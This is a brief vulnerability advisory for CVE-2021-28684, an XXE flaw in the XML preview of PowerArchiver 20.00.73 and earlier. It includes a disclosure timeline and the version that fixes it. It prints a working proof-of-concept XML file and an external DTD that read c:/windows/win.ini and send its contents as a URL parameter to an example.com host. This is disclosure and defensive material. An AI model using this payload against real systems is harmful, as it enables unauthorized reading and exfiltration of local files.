CVE-2021-28684: XXE vulnerability in PowerArchiver <= 20.00.73
Parser used for previews of XML files in PowerArchiver <= 20.00.73 allows processing of external entities, which might lead to unauthorized access to local resources. Minimal user interaction is required when conducting the attack, as user only has to select the XML file in order for the preview to load.
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://example.com/test.dtd"> %sp; %param1; %exfil; ]>
Content of test.dtd:
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://example.com/?%data;'>">
Once the file is previewed, application makes two requests to the remote server. First, it attempts to download the test.dtd file and once entities included in it are loaded, it discloses content of the file specified (win.ini in this PoC) via a URL parameter in the next request to the server.
Vulnerability has been fixed in version 20.10.02.
03/12/2021 – vulnerability reported to the vendor 03/18/2021 – CVE requested, assigned CVE-2021-28684 04/19/2021 – vulnerability fixed in PowerArchiver 20.10.02 [PA-2886] 06/21/2021 – CVE-2021-28684 updated with details and published